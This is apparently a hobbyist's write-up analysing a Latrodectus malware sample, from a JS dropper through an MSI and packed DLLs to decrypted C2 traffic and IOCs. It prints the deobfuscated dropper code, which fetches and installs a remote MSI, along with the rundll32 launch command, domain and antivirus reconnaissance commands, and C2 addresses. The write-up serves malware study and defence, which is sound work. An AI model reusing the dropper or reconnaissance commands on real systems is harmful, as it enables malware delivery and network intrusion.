- Intruduction
- Stage 0 - The JS
- Stage 1 - The MSI package
- Stage 2 - The DLL
- Stage 3 - Another DLL
- Stage N - Final thoughts
- IOC
Welcome to ArachnoAnalysis: Spinning Webs with Latrodectus - A Novice's Dive into Malware Mysteries. The idea for this analysis originated from my experience with a forensic challenge on the Swiss Hacking Challenge (SHC)
CTF. This challenge encompassed investigation, reverse engineering, cryptography, web exploitation, and obtaining access to the Command and Control (C2) interface – essentially, it was a malware analysis challenge.
Upon completing this challenge, I found myself contemplating: what if I were to obtain a random malware sample from Malware Bazaar and explore it further? This curiosity led me to download a random sample, and to my surprise, it turned out to be a Latrodectus one.
Starting the investigation into a real sample, I faced numerous challenges and dead ends due to my lack of experience with such sophisticated malware. However, I was fortunate to have the support of my friends, c8c4r1, avpxyyf, and fr0z830, who guided me through this journey. Without their invaluable assistance, this analysis would not have been possible.
Ahoy! This analysis was a blast, a team effort fueled by friendship and late-night shenanigans. We turned our chill session into a malware mystery-solving extravaganza!
Stage 0 is appearing as an obfuscated JS file <filename>.js
which contains the code that attempts to download an MSI package from a specified URL http://45.95.11.217/ad.msi
. After downloading the MSI package, the JS file is using the ActiveXObject
to iternact with Windows Installer and installs the product using the InstallProduct()
method.
The variable a
employs an Immediately Invoked Function Expression (IIFE), encapsulating a function designed to locate and execute a script embedded within the current script file WScript.ScriptFullName
. It utilizes the Scripting.FileSystemObject
to navigate the file system, particularly for reading the lines of the script file. Within this context, the e()
function iterates through the script file, identifying and extracting embedded script content, storing it in d
. Subsequently, the h()
function attempts to execute the extracted script content, provided it's not empty. The resulting object includes a method j
, intended to orchestrate the entire process of discovering and executing the embedded script.
The a.j()
invocation initiates the execution sequence by calling the j
method of the a
object. This method, in turn, endeavors to execute the embedded script discovered within the current script file.
function installFromURL() {
var installer;
var msiPath;
try {
installer = new ActiveXObject("WindowsInstaller.Installer");
installer.UILevel = 2;
msiPath = "http://<snip>/<filename>.msi";
installer.InstallProduct(msiPath);
} catch (e) {
WScript.Echo("failed: " + e.message);
}
}
installFromURL();
var a = (function() {
var b = new ActiveXObject("Scripting.FileSystemObject"),
c = WScript.ScriptFullName,
d = "";
function e() {
if (!b.FileExists(c)) return;
var f = b.OpenTextFile(c, 1);
while (!f.AtEndOfStream) {
var g = f.ReadLine();
if (g.slice(0, 4) === "") d += g.substr(4) + "\n";
}
f.Close();
}
function h() {
if (d !== "") {
var i = new Function(d);
i();
}
}
return {
j: function() {
try {
e();
h();
} catch (k) {}
}
};
})();
a.j();
An MSI package itself cannot be considered malicious because many products use it for their installation processes. However, in the exciting realm of malware analysis, we have to give it a chance to show its malicious side, RIGHT??? RIGHT... Let's dive in and see what mischief awaits!
In order to analyze the MSI package, we have to install a specific 'unpacker' and see what the package contains. I chose to use the lessmsi tool for this purpose.
Let's start by diving deep into the package extractions, where we can find that a suspicious DLL is being extracted from the package named 360total.dll
.
Very interesting finding, BUT let's proceed with the package investigation and explore the tables.
In the property table, we can find information regarding the package creator, such as the manufacturer, description, and product name. Based on the name 360 Total
, the entire setup seems to be an impersonation attempt of the 360 Total security solution AV.
A very interesting table is the CustomAction
, where an actor can insert their own custom actions or commands into the package flow. Here, they could potentially execute the extracted 360total.dll
—which is likely malicious—.
C:/Windows/System32/rundll32.exe [LocalAppDataFolder]sharepoint\360total.dll, homq
The above command is executing the DLL with the homq
for entry point, which will be executed.
Note that rundll32.exe
is a legitimate executable that exists on Windows. However, like other similar executables, it can be used in a malicious manner. e.g. LOLBAS Rundll32
Finally, it appears that the entire packaging process was carried out using Caphyon Advanced Installer.
Let's proceed by extracting 360total.dll
and begin analyzing it. We'll open it using the Detected It Easy
tool, which is already installed on FlareVM.
Based on the DIE
tool results we can clearly see that our file is a Linker: Microsoft Linker(14.0, Visual Studio 2015 14.0*)[DLL]
.
Further exploring DIE
features, we can uncover the DLL exports, which essentially are the available entry points, or functions, that can be utilized during execution. The available entry points are:
- homq
- CreateObject
- RegisterInstallTime
The homq
entry point seems very familiar, as we identified a rundll32.exe command executed within the MSI Installer.
Alright, let's have a bit more fun and investigate the available section headers of the DLL. Among the 7 available section headers, the one that particularly intrigues me is "yhDm^"
, likely due to its high entropy, suggesting it's packed and possibly encrypted.
Using strings at packed section we can see that the section is probably encrypted.
Now that we've discovered that the "yhDm^" section is packed and encrypted, let's open Ghidra and dive into some nasty code.
Within the entry()
function, there's a call to FUN_180070044
, and the code exhibits various forms of obfuscation, such as variable reassignment and string concatenation. However, there's a specific section of code where the DAT_180175000
is decrypted using XOR functionality. Before delving into that part, it's important to note that at the beginning of the mentioned function, there are some variables with unusual hexadecimal values, indicating possible strings obfuscation.
In the following image, we can observe that DAT_180175000
corresponds to the packed section "yhDm^"
. The code loads the encrypted data from this specific data block and decrypts it using XOR. Since the data is encrypted we have to decrypt the specific data block with the key that encrypts the data.
After saving the encrypted block to a file in hexadecimal format, it's time for the CyberChef playground. Decoding the hex data reveals the absence of an MZ string at the beginning, indicating it's not a DOS MZ executable
. However, at the end of the data, there's a strange repetitive string, S5XlpOdyMN(U)RxRw
, which serves as the actual XOR key. This occurs because when XORing something containing NULL bytes, the XOR key is displayed instead.
ITS TIME FOR MZ! Using the XOR key, we can decrypt the data, save it, and start investigating the new findings.
REPEAT THE SAME STEPS! Our new journey starts by opening the unpacked file with the DIE
tool and beginning our investigation. Interestingly, the file yields the same results as the first DLL: Linker: Microsoft Linker(14.0, Visual Studio 2015 14.0*)[DLL]
.
Same results, but even juicier DLL entry points! This DLL contains four specific entry points, and it appears that each entry point exhibits different behavior. The available entry points are:
- extra
- follower
- run
- scub
The same entry points can be found when the DLL is decompiled, possibly because the malware author forgot to delete their comments.
MORE DIGGING! As we delve into the decompiled code, we uncover another XOR functionality following the same pattern as the first one we found. It decrypts data, presumably for use in malicious actions by the malware.
The DECRYPT_DATA
function is called within the FUN_180003868
function, with the DAT_18000fa00
data block as a parameter, indicating that the data in this block are encrypted. In the listing menu, we can observe numerous data blocks (DAT_*)
containing encrypted data, ranging from 180010467
to 18000f000
.
However, we can delve deeper by searching for reference calls to the DECRYPT_DATA
function. Let's decrypt some data by extracting the encrypted data within the specified range and using the author's XOR code for decryption.
The decrypted data
, along with the decryptor.js
script, is available in the repository files, courtesy of avpxyyf.
The commands, strings, paths, HTTP parameters, and so forth mentioned above are decrypted during the DLL's execution flow to enable their utilization in the malware's operations.
- ipconfig /all
- systeminfo
- nltest /domain_trusts
- net view /all /domain
- nltest /domain_trusts /all_trusts
- net view /all
- net group "Domain Admins" /domain
- /Node:localhost /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
- net config workstation
- wmic.exe /node:localhost /namespace:\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
- -snip-
Noteworthy is the discovery of the sample campaign ID and campaign name, as outlined by Proofpoint researchers in their analysis here. The campaign ID and campaign name, as mentioned in the Proofpoint analysis, can prove invaluable for tracking the threat actors.
- Campaign ID: 3828029093
- Campaign Name: Facial
You can find some dynamic analysis images in the dynamic
folder within the repository files.
UPDATE! Since the malware communication is TLS encrypted, we have to decrypt it in order to see what's happening behind the maths(cryto). So the process is simple: let's install the mitmproxy tool, import the proper certifications, and then restart the VM in order to apply the changes.
After the restart, the scheduled task will execute, initiating the first request towards the C2 server grizmotras.com
.
Let's proceed by opening and extracting the first POST request. And there it is! base64-encoded data. The data is encrypted with RC4
, as mentioned by Proofpoint analysis. However, it is not encrypted with the 12345
key for decryption; instead, it is encrypted with the key eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
, which can be found in decrypted_data.txt
.
YjOeEyiMk3RrE5vcC/HWCbEd2NSiC0Jmlx62htLTKmiBV8iH7SdWtaT67MMI6nGhcZiBWLUUfs9FloPMfPu+9sL8KXzJchOQzDFsA1DtTXNivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoMue4BHa09V9+9KX86r6yelVLzzEuoUHYEHndRII4kEQD1A+YlbiopJTN3bpaQp9wwZbk3sf/qY4M2Pmi15DTROC+Del2WpTMMYfdVRQMGsWAabn9Vmj6zUuxQ6SFvYOgLbviFDl2wOGQNrc=
By applying the From Base64
-> RC4
recipe in CyberChef and providing the encryption key, the following data will appear:
counter=0
&type=1
&guid=416A4D4BE980D5D19DF9A561ED09
&os=6
&arch=1
&username=FlareVM
&group=3828029093
&ver=1.2
&up=9
&direction=grizmotras.com
&mac=00:0c:29:60:6e:16;;00:ff:dd:a9:8d:ab;;
&computername=DESKTOP-J6MJG2Q&domain=-
QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXz7Nr6M3fNZVja7z9+GEHeLzlsuaBLxXI=
CLEARURL
URLS|0|https://grizmotras.com/live/
URLS|1|https://kokcheez.website/live/
Finally, upon analyzing the requests reveals a consistent pattern: each request is made roughly every 10 minutes. This is directly tied to the implementation of a persistence method, which executes every 10 minutes.
https[:]//jarinamaers[.]shop/live/
https[://]wrankaget[.]site/live/
https[://]grizmotras.com/live\
https[://]kokcheez.website/live
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
.js 156c0afc01a5e346b95ebdb60cea9b7046ad7a61199cd63d6ad0f4ae32a576ac
.msi 8041a15e27c785f2adcce9e8c643f5cc619b52e50cd36ff043d13c4089ce1cad
.dll 1625ac230aa5ca950573f3ba0b1a7bd4c7fbd3e3686f9ecd4a40f1504bf33a11
unpacked.dll a1e13e8222e0028a64972eb9dcc91f7c8e3f9b7ae49d84dc5029274c1c62e927
update_data.dat
As I stand at the crossroads of this exhilarating journey through ArachnoAnalysis: Spinning Webs with Latrodectus, I can't help but marvel at the whirlwind of excitement and discovery that has unfolded before me. It's been a wild ride, filled with twists, turns, and more than a few "aha" moments. But you know what? I'm not ready to hang up my detective hat just yet. Oh no, not when there's still so much left to uncover in our trusty ol' Latrodectus sample.
And hey, let's not forget the best part: this whole adventure has been an absolute blast! Who knew that diving headfirst into malware mysteries could be so darn fun? Certainly not me, but hey, I'm not complaining. It's been a journey of firsts, and I've loved every minute of it.
So here's to the next chapter, the next challenge, and the next round of "what the heck does this do?" moments. Bring it on, Latrodectus, because I'm ready for whatever you've got in store!